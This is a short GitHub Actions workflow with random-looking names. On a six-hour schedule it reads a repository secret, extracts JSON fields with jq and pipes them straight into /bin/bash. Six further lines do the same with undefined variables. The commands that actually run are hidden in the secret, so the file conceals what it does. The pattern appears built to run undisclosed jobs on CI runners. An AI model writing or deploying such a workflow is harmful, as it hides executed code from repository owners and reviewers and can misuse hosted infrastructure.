name: oakumtick

on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: oakumtick
        env:
          ygfny31: ${{ secrets.ygfny31 }}
        run: |
          echo $ygfny31 | jq -r .qcp4 | /bin/bash
          echo $v99 | jq -r .lih9 | /bin/bash
          echo $xdt6844 | jq -r .yi51 | /bin/bash
          echo $y10 | jq -r .tpil912 | /bin/bash
          echo $lc59963 | jq -r .z1 | /bin/bash
          echo $bmux7412 | jq -r .me3 | /bin/bash
          echo $qyp548 | jq -r .tovgi6 | /bin/bash

